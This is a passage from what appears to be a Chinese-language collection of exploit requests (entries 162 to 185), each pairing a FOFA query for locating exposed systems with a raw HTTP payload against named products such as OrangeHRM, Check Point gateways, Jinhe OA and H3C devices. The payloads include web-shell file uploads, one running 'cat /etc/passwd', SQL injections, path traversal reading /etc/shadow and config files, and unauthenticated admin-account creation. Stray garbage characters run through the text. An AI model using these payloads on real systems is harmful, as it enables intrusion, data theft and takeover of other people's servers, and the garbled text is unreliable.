v! }/ J) H$ {4 t<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>6 t! y$ t6 P$ W+ Z
<tag>3</tag>) b: ?+ ?+ A* \" b+ g
</UploadResume>2 R. K; j, l9 M' E
</soap:Body>
; k& `8 B: D8 A. z' `& ~3 c0 Y</soap:Envelope>6 K1 Z, B1 e( D! B: l
8 G: M9 ?- |% M, q; H4 u8 J$ M [- y/ \& s8 j" A. I/ }8 b& c
http://x.x.x.x/dizxdell.aspx0 @! k; Y8 H6 x$ x
! g" p8 R/ l- r V" M; s162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
- T. O- ^6 }$ E/ ^1 e$ A( G( SFOFA: app="和丰山海-数字标牌"
4 ]6 g- O7 v9 t3 O# x7 EPOST /QH.aspx HTTP/1.1, j' D, \( A" m2 [0 H' \
Host: x.x.x.x
2 c( \% U& Q& Y5 z LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.03 X- k! S3 d8 d7 Y) I b0 K# @
Connection: close
?, m/ j/ [2 S: {9 x7 l8 H, ~Content-Length: 5831 U* i6 s9 p* o- R, O6 q4 T
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
$ ~3 Z2 c, _. k- |, PAccept-Encoding: gzip
5 }( Y" S1 q2 }3 l( ~2 i8 L0 ^ L ^8 d, `0 l+ G( B. Q
------WebKitFormBoundaryeegvclmyurlotuey
7 r, J8 C# f" B3 o/ x/ I; K' T* mContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"8 n+ k6 c% L5 V7 q( Y8 I
Content-Type: application/octet-stream5 n$ l+ u$ A" c7 k X/ _' u
% N( y! }! o" z8 d
<% response.write("ujidwqfuuqjalgkvrpqy") %>
* z1 d6 _4 O- w------WebKitFormBoundaryeegvclmyurlotuey
, c% U6 @: q7 P5 xContent-Disposition: form-data; name="action"
/ z$ B4 J% d1 o( V3 `; w3 R
) t% l }& N3 cupload! V. p- S! f" K, h" O% ~0 n
------WebKitFormBoundaryeegvclmyurlotuey, K4 m+ B5 O; x. ^8 n i
Content-Disposition: form-data; name="responderId"
; @# O- N; a& T6 ?, S$ R: j/ C A
3 Q, P l) P# d/ o: GResourceNewResponder
8 x6 e4 w2 p e0 C* N0 ^0 x------WebKitFormBoundaryeegvclmyurlotuey
# P% c2 `; ]$ l2 a lContent-Disposition: form-data; name="remotePath"
3 i& E0 o( J( {! b! |; t' q' S9 V$ N: u1 \( g( k: \
/opt/resources Y# x( V2 m5 _' D4 h3 n
------WebKitFormBoundaryeegvclmyurlotuey--
% `9 _) v# M! d. N* P' h( V( [6 E3 j4 ]1 X
7 }; |$ W7 P/ |; O0 A2 U/ i$ K
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
8 b1 C0 f1 f1 N/ {$ T, f& W' K8 c6 e, v& [
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
. a0 k, o# @& w# p+ S; d& cFOFA: icon_hash="-795291075"
( @9 M) B" m, S' A8 QPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
+ c, X7 W0 E2 M" ~Host: x.x.x.x
- s5 C( G; f A' F, a8 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
) T. o/ m" a2 [ p! UConnection: close
, P* y) y" A6 ^2 eContent-Length: 293
6 @1 U# y; X" c" c8 R# C1 xAccept: */*3 ^9 r- H6 b3 R M6 A
Accept-Encoding: gzip, deflate! n1 K4 ?3 N w# @3 h
Accept-Language: zh-CN,zh;q=0.93 @7 _3 f; a% H" H6 v% J
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod k: d( Z9 r* g7 p$ W9 W6 a
+ }9 E9 f, K! \5 q5 @$ j! V
------iiqvnofupvhdyrcoqyuujyetjvqgocod) K; }( {9 z4 R, t+ I
Content-Disposition: form-data; name="name"
& I8 k5 u+ D' q5 S( B" ]0 O! p7 _8 {$ b. x- Q4 [' }
1.php
$ `2 r/ ?6 p b; |& T. f$ Q------iiqvnofupvhdyrcoqyuujyetjvqgocod
5 `% i6 ^) o( _Content-Disposition: form-data; name="upfile"; filename="1.php"' X( M$ O( J k [( \
Content-Type: image/jpeg8 n% T% J d1 ?4 ^ v
+ }% Z6 V4 Y0 r" w- b! S
rvjhvbhwwuooyiioxega7 x4 T; {4 g5 v0 z/ E' h
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
; e/ T. Q' T* t9 h2 A
1 h" P* n$ G; j) c% U' R8 n2 @# k
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传4 e# j! O; P$ k
FOFA: title="智慧综合管理平台登入"/ i6 O" S- r2 R* w* y: A7 S
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
/ S) A R& ~5 W8 m5 g$ WHost: x.x.x.x
5 `/ V# M/ ^5 [4 _, HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
* S% z1 x- G. dContent-Length: 288# G- w6 `3 C2 F
Accept: application/json, text/javascript, */*; q=0.01. U0 `3 w8 E4 \( }' u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
0 Z" R# D# g3 C9 ?Connection: close3 O$ Z8 s: g1 p1 Q# e
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
9 V% b2 v/ N+ Y4 }X-Requested-With: XMLHttpRequest
- `8 ~8 ~. u; sAccept-Encoding: gzip
( O8 f s! ]5 m3 h& h [+ P! t9 w+ D- ]9 A
------dqdaieopnozbkapjacdbdthlvtlyl
$ O5 y: e' o. A% t3 o6 B) n( ?Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
2 T7 } l6 H$ P9 f4 ~' BContent-Type: image/jpeg
/ d- [7 D3 J3 z5 q: s t
% Q( e, @. u$ P! p; l2 C5 `<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
. l( T. n3 S1 {1 v( [: v- o------dqdaieopnozbkapjacdbdthlvtlyl--
8 \! R* T1 J: g- B$ o& i: N3 s2 V2 x; J. T. X) V0 f% S
/ @- } K7 o: \' Z7 k1 W7 D5 o& Ahttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
5 X2 `- t5 [6 L7 T$ L
9 W r# a0 Y, D; K. g% @165. OrangeHRM 3.3.3 SQL 注入7 g6 R" E" X$ ^. }8 C
CVE-2024-364283 e/ h( a( L9 I3 ~( j. s
FOFA: app="OrangeHRM-产品"" P+ v; ~- b- z" u% F+ Z/ Q. n
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
7 d7 ?# l, _ B/ @5 m, O. U9 M5 G2 [+ L/ o1 g8 u9 W$ b
1 ^9 d8 y3 y( ~ N! b7 [$ b
166. 中成科信票务管理平台SeatMapHandler SQL注入) L* N6 z& h3 I r* \1 N# P' N
FOFA:body="技术支持:北京中成科信科技发展有限公司"6 l) X8 F; W, {. G" {6 n* `. _" @- w9 V
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
; w u' O9 m$ U6 C, ^2 _6 _Host:
" s% x! S5 v! ^: Q" t( x6 }Pragma: no-cache
. H U/ [- q* V \. y4 J) `Cache-Control: no-cache
' W* v5 {$ L! G- @; jUpgrade-Insecure-Requests: 1
) X# {: m: z% }5 SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36& I4 H. c6 {/ x ?/ d* w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 H/ [7 B: q" x" q9 W+ m# r
Accept-Encoding: gzip, deflate' P1 b" |& n' l* V! Q7 P
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8' E0 x& S' a" C1 G8 ]' h- m
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
3 K8 Y0 H# n+ _0 u$ C/ D& Q) v1 lConnection: close
W% r v) g8 I* _5 X7 }4 e- XContent-Type: application/x-www-form-urlencoded+ x3 @/ E. y! p7 j" g
Content-Length: 89
) D; K+ b5 h3 U. D2 \+ m. p) D6 q( g4 g7 X c# Y
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE2 M6 _. Z, `# P/ D: D) ~& O
/ L) C' f* p+ g3 D p0 i2 m
, h# I! _! x5 H9 }. y7 }% e+ Z# t7 o167. 精益价值管理系统 DownLoad.aspx任意文件读取
) C/ g& z) L/ e' i7 P. hFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"7 ]1 r' a- k$ P5 }" J, _% k3 T; C0 r
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1; w# F# q0 L4 j2 A+ T
Host:
6 p" P9 w7 @" K8 y4 P/ oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* p& y( ]% z& M- ~7 Z HContent-Type: application/x-www-form-urlencoded/ K8 g2 b- ], _; N
Accept-Encoding: gzip, deflate6 e* x9 [7 f4 u$ R( r( [9 p! L
Accept: */*2 d$ _' Y& r: r! S
Connection: keep-alive
l1 y g2 Y# d8 @
: I- D0 u4 v- L, V, d
- G5 P3 i: S4 Z9 t- i168. 宏景EHR OutputCode 任意文件读取2 o* g+ i n6 `7 j
FOFA:app="HJSOFT-HCM"5 S' N4 w4 N. L& |
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.16 }! a$ g. \2 U \8 t" L! }
Host: your-ip
( e* {6 ~; H" V" H$ B. Q+ M" }, vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
4 J' Q3 t$ l& N2 s/ i7 J$ BContent-Type: application/x-www-form-urlencoded
6 g- w0 q; F$ q9 G. @Connection: close
" v- x3 c* k$ S8 g- h" B6 }+ z0 p) {, G! ?9 E# x
0 y6 s: d4 l: ^) a; E' W7 a; i
: B) N, f' T, j8 j- g
169. 宏景EHR downlawbase SQL注入
# N; u( e* b! a+ [, o5 r3 n4 [FOFA:app="HJSOFT-HCM"
% v- h9 v2 j/ W+ \7 i7 Z7 KGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1" t9 P! ]$ _, E+ ^9 M
Host: your-ip
' g" Z2 Q. T) i; ~1 T, AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
v `* e: g/ B* E& m2 G4 mAccept: */*
; H E/ F0 A3 mAccept-Encoding: gzip, deflate& ~* q% R" s3 }* ]. w8 B' ^$ g
Connection: close2 {3 W$ V% |! D1 `8 F3 K
% L' V3 f- q z, J7 {. i W0 @2 O& {) O7 C7 L, `' j
2 ]" G" ~5 S. z" X8 D% s/ a0 C170. 宏景EHR DisplayExcelCustomReport 任意文件读取
% l8 ^, t7 m7 k% l! _FOFA:body="/general/sys/hjaxmanage.js"
/ e) K0 ]& }7 ^! h8 mPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1+ H, k. o# h( z& x+ a3 F7 H. s8 v
Host: balalanengliang! X' L7 o) k: Q! }# b- c
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 Y9 e: q. f' h
Content-Type: application/x-www-form-urlencoded4 c; Q$ c+ g! ~& g' o( @
, J( [* M/ E6 W& Z2 j8 O; ~2 @filename=../webapps/ROOT/WEB-INF/web.xml5 T/ N8 K) H# y& c. g
& r( u9 ^/ @: _+ S# q
/ J7 T; |2 R2 `4 g) R3 R: K7 ^171. 通天星CMSV6车载定位监控平台 SQL注入1 i3 }" S5 d4 U* d! J( f0 g0 r7 ?
FOFA:body="/808gps/"3 ^( }. J" m: j8 ]4 m* Y* I
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1, w% j3 d5 K& X) B* b; J
Host: your-ip" ~5 ^+ i7 p- K1 a/ L+ I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
# Z( p" |2 Q1 b+ v# z2 u' j5 PAccept: */*5 D" ^$ E( z2 j6 A% y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 ?4 r: w- `, l& m! M( e: D: d/ zAccept-Encoding: gzip, deflate
: s5 O1 |: l5 y- P+ MConnection: close g9 m; X) d3 u+ f- r6 h0 t& m$ j) r
1 o* p7 C% F; X
1 E+ b( U1 r* X, _4 p. t7 m: S
' d1 \# _7 [6 u! m# K c; r
172. DT-高清车牌识别摄像机任意文件读取
3 a+ `: A! J. k0 B( V" g- _- n+ ]FOFA:app="DT-高清车牌识别摄像机"$ C! o2 _) ]( a
GET /../../../../etc/passwd HTTP/1.1
( N/ ^& v& S4 g4 ]4 Z5 HHost: your-ip* u0 u+ h. r3 w9 C, O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" A D0 R# g' m+ X& G3 l6 Y
Accept-Encoding: gzip, deflate
: b$ q/ `9 `; d0 V7 Z4 QAccept: */*5 x( e$ o) f& x
Connection: keep-alive0 Z3 Z3 t# A% f. s6 F1 H
' A' }+ K6 ^, q9 C. s( r6 ?
/ `8 T) \, ~$ v) V3 y/ K; ]' a3 @% Z0 B7 A
173. Check Point 安全网关任意文件读取
) N% y4 U: i3 i- y* fCVE-2024-24919
. z7 B% x- a$ aFOFA:app="Check_Point-SSL-Network-Extender"5 M7 u1 K: e9 R" c6 @2 k
POST /clients/MyCRL HTTP/1.17 r: }* O \! h! j, q- K& n" C
Host: your-ip
$ I) |7 y3 Z( e2 h( @Content-Type: application/x-www-form-urlencoded
# @, v9 l2 y, Y1 u M$ ^
( w, d$ ~3 B, y$ p: u1 n( kaCSHELL/../../../../../../../etc/shadow
6 s$ D# ^3 C$ l6 x7 M% m2 y- Q4 d, `6 b1 w; x3 {$ B1 n
9 d/ \& w6 c+ P# |7 G: x- S) J
- a$ Z' G* H& I% p9 t* i
174. 金和OA C6 FileDownLoad.aspx 任意文件读取9 P: H5 v+ q \5 r* v
FOFA:app="金和网络-金和OA". c, W$ B- a3 Y2 U/ f; v
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
4 G/ Z0 B( ?, V7 CHost: your-ip$ k* l/ ?* A% j! l! o" x ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
& Q8 K( E' Q y" O/ gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 V0 X; M8 D) TAccept-Encoding: gzip, deflate, br" r w% u x9 T6 i C: `
Accept-Language: zh-CN,zh;q=0.9. {8 Z/ v5 _# S& F5 ]" Q$ }, b
Connection: close
; g5 ^2 Z N0 y, e! Y( B" }/ l$ A) k, x* p4 {: r
" {% H3 s2 {. M% t1 J; w5 g7 [2 z3 t. W; w) L( v2 X/ a
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入% B2 ^6 e$ d1 b. V
FOFA:app="金和网络-金和OA"
% V' n$ P2 A9 pGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.12 L0 ?- r1 o8 x9 L1 ~, }; q3 b
Host:
2 q0 v7 H. W. b8 xUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; r' l& D; k6 u+ f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- B' J& B2 c( o2 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 [6 {# ^& g) AAccept-Encoding: gzip, deflate
7 L [) ?- C) S" C9 uConnection: close
! h' w6 N# r: q8 M( PUpgrade-Insecure-Requests: 1$ {2 H* b8 @* L, P# q/ u: h: Q
1 |$ ^2 Z; `7 ~- v
" l. Z0 A4 J: W8 s/ t1 I" }- C176. 电信网关配置管理系统 rewrite.php 文件上传
# X: h; a6 }* L! n% D4 A9 w- ?FOFA:body="img/login_bg3.png" && body="系统登录"- y+ C2 o2 l' i# m' S: M8 c
POST /manager/teletext/material/rewrite.php HTTP/1.1+ e' |2 p1 g; t' G+ R. G
Host: your-ip
L. i' l1 `5 Q5 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0$ Y+ S6 ~3 n5 ?3 @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT# |2 I$ d, P6 y* x
Connection: close
8 V( |; F1 a, |7 [ n
4 }; x7 _8 D' x$ C------WebKitFormBoundaryOKldnDPT
( A- T# ]! E% o$ z5 f3 ]Content-Disposition: form-data; name="tmp_name"; filename="test.php"* x" W9 B4 G" F6 ]: S4 z# Q
Content-Type: image/png
( C U* }) m+ Y 2 Q: z9 n6 j* `% }1 v8 d& I
<?php system("cat /etc/passwd");unlink(__FILE__);?>1 _1 G+ T; L! ` W9 W7 n* R) b
------WebKitFormBoundaryOKldnDPT/ ~" P: _+ \! ]4 y
Content-Disposition: form-data; name="uploadtime"
& s' Y1 Q& z7 a, j2 T- E* k % s- Z$ E$ s" n0 l
/ a% `3 _0 \- ]& ?# K------WebKitFormBoundaryOKldnDPT--
& |" m5 Z; e, d/ d0 p
- _/ \( {/ G# l2 A3 J. |# }1 g- B1 x% r" f8 e( `
0 A* \0 J& \$ x* k177. H3C路由器敏感信息泄露* V" y2 M( f' q
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
) @1 j! ]% G) p/userLogin.asp/../actionpolicy_status/../M60.cfg
: C$ Z9 m# O1 {: e J& Y; X/userLogin.asp/../actionpolicy_status/../GR8300.cfg: a) \1 M% ?" ]" @- g. K5 W" i3 J
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
|. P0 Y; e- j+ q; n' l) d: a0 G/userLogin.asp/../actionpolicy_status/../GR3200.cfg
$ v% z6 C2 f `/ J8 f/userLogin.asp/../actionpolicy_status/../GR2200.cfg6 n, _0 K6 M# H& W" Q% l
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg( z q( Z- w( a/ ~
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg2 C" z0 W& [& | g- s
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg. [' l) U9 v" P0 p9 M
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg" V, d' l; ` V& e
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
8 l' a8 C. o6 B& B2 H% J; K2 \/userLogin.asp/../actionpolicy_status/../ER5100.cfg: f5 G @6 C9 C E* m. |2 g
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
R1 w) F- j7 `% |/userLogin.asp/../actionpolicy_status/../ER3260.cfg" m! x3 G; \# K/ w
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg' n2 s; } E4 C1 g+ K
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
8 G7 T1 j; v5 S* K& Q/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
) L. `% @, S( q/ l9 o# o+ y& ~! ]/userLogin.asp/../actionpolicy_status/../ER3108G.cfg6 y& F# P- s; N2 z# T5 H+ \- S1 u
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg. O7 K6 P4 i5 x* [# E. Y
/userLogin.asp/../actionpolicy_status/../ER3100.cfg6 ~( K: E9 G3 I! P. J3 ?
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg; i: J5 }* l1 g2 V0 m' s( F& Z
1 V4 C% z/ @: k$ ?/ K
8 `9 F9 `3 S6 e. n( Z+ C1 I0 d' q
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
5 O! \3 D3 i9 m. @FOFA:header="/selfservice"
: m# m1 G1 b3 r3 `POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1( _) k: p, r! `' }
Host:
& N" l. V' F0 E$ ^' i k* {# aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 T6 r( F+ t+ u$ F* v; A( p3 S0 v
Content-Length: 252
; d0 _) y6 y% U4 S& x0 LAccept-Encoding: gzip, deflate4 m* J* g: F# H- v3 k# f& s
Connection: close
, c v+ ?! g8 N+ ~ i5 RContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
2 L" c% J3 l- R' z+ x-----------------aqutkea7vvanpqy3rh2l1 v- ^+ E# G( v) n
Content-Disposition: form-data; name="12234.txt"; filename="12234"1 k$ ^% K# W6 _0 v9 T
Content-Type: application/octet-stream7 a7 f1 C5 o' N2 a
Content-Length: 2553 R% Y( p3 F& A$ j- C% o
. K" J* |6 h' C, Z* K# d- s12234) B0 k- l! f5 s0 W- `4 C
-----------------aqutkea7vvanpqy3rh2l--
0 _* z5 {" F3 H9 V/ `4 l3 G. l* S- |8 Y* O
! u) H6 J/ T5 b) u/ Z3 B8 X5 U
GET /imc/primepush/%2e%2e/flex/12234.txt3 `5 H( c' C3 x: W8 k& @8 U
0 h4 ~, S9 W# i( ]1 e
; R |+ g' s! M9 A; b H179. 建文工程管理系统存在任意文件读取) f+ j/ U) ~7 O
POST /Common/DownLoad2.aspx HTTP/1.11 o) \- J% l$ q' t8 N2 v! J
Host: {{Hostname}}
6 u" q! X3 c) ZContent-Type: application/x-www-form-urlencoded
* K5 N* [/ `! G' b' E7 g8 G2 eUser-Agent: Mozilla/5.0" s$ I7 I5 G. M% P9 d
) k |6 D1 V# e* Apath=../log4net.config&Name=& f( T% t6 L& C1 z. U8 X
& P3 B( R6 s' t7 |. v
6 a5 A/ B- `2 [8 [1 ?% O3 n180. 帮管客 CRM jiliyu SQL注入
, y* J9 v Z5 LFOFA:app="帮管客-CRM". U. l2 O( M5 `1 P4 d! y) |& p
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1: X9 \4 V3 o* s: u) D6 V
Host: your-ip( q# k9 v) h8 K9 R4 z+ \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. }7 i+ ~ \. r* d% J1 u' Z& W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! A5 l( R* c) z
Accept-Encoding: gzip, deflate
& N# U) m) s7 r% q! [4 z7 T' pAccept-Language: zh-CN,zh;q=0.9
0 i# |+ S, c0 P2 A& f$ z. wConnection: close0 o, z1 B6 k" t( a2 f7 C
% j2 z- I$ o0 c( c
* S# ]# ^3 a$ h- ?; l& i181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
g% ~7 P! b: D, v$ D4 o- P4 wFOFA:"PDCA/js/_publicCom.js"9 g" B' w% m7 r" h( @
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
/ V5 I" i1 q; D, ?Host: your-ip& z2 W5 R. N( Z' [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.369 e$ e8 `8 b) r7 f* g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 ^- x/ i! y- g: J$ cAccept-Encoding: gzip, deflate, br
- a$ ~, N* w# m& @# F2 n0 O5 mAccept-Language: zh-CN,zh;q=0.9
& }- Q3 Q6 a' ~9 J6 d) P( q; ?Connection: close
# I- }' z( a! LContent-Type: application/x-www-form-urlencoded
' _9 z) g! Y! H7 p2 z* O* z) N' H: K" h
- j$ x$ L, |1 x7 Laction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20, @6 I+ R3 E( u) o7 P
- X6 \9 I3 M. i! |% N% L$ B# @1 ?3 D% `
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
3 K9 c5 Z' T% Q" R! W% y; zFOFA:"PDCA/js/_publicCom.js" |+ F4 E" }) x+ r5 s7 x
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
8 F0 d3 X# }; N$ q% IHost: your-ip1 n& [2 y8 W4 @) i" `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
" r# g& a. }: {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ G. b, [* ]- c9 B2 Q5 }5 @! h$ V
Accept-Encoding: gzip, deflate, br2 H+ A' O2 M3 ^' K) ]$ o, ]* c
Accept-Language: zh-CN,zh;q=0.9$ @; T+ L( q3 k9 u( g
Connection: close5 P4 j, ^& I6 h% E
Content-Type: application/x-www-form-urlencoded' N0 t0 @# }$ s- [' ]
) O2 }- S7 Z0 U, V6 N
}; \+ T3 Z( h- n# u" M* Ausername=test1234&pwd=test1234&savedays=13 ^5 r f: K( a, ~. R/ G8 |
9 l- |0 L) _! {" {7 K" ?% T7 y
! q% l/ V9 w5 c183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
, u# w% N. U' v& U, S: Q5 sFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
3 @: `" }% q, ^# B6 j! c S: u6 sGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
& K) B8 s( R% z8 MHost: your-ip" |- W. l: ^2 Y! m( Q+ B+ e6 s! `
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
% b1 U! A6 Y M$ dAccept-Charset: utf-8
# V5 v7 B5 O7 B: _* \$ QAccept-Encoding: gzip, deflate( d9 @6 H1 g1 R- |3 c" ?1 v
Connection: close; V) n; k8 d4 v' }6 x
/ `/ u- R- c2 i: n* m' J1 g E* z
& L" W+ N# Q1 u- O: `6 k3 r# A184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加& W3 j/ F! V7 J7 ?* `
FOFA:server="SunFull-Webs" f* X. y6 {' c' X4 c3 {
POST /soap/AddUser HTTP/1.1
2 J. y4 w7 ?3 C7 ^2 w! B1 ZHost: your-ip# {& h. R# c8 t/ f; {
Accept-Encoding: gzip, deflate
* @0 @ X; [ n6 S) WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
, i/ u& b, C/ W" K/ uAccept: application/xml, text/xml, */*; q=0.01
U: e2 E9 m- u% L$ f- C+ p4 LContent-Type: text/xml; charset=utf-8+ }9 U) A4 \% p% ~) k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 c, P6 N0 i. y
X-Requested-With: XMLHttpRequest
( q- s5 @9 N9 o: v/ k3 w. p1 f( t
- p2 y2 o3 }1 a! \
( N# `4 q8 t* Linsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
- m S' G* w: k6 t: @( h/ n9 S6 } V% y* \
: q5 x; F* y! _- j
185. 瑞友天翼应用虚拟化系统SQL注入
0 X+ a5 e0 y' B. o; jversion < 7.0.5.1+ F9 U0 b; j+ {
FOFA:app="REALOR-天翼应用虚拟化系统"' k& O0 ^8 ?/ d! K- I
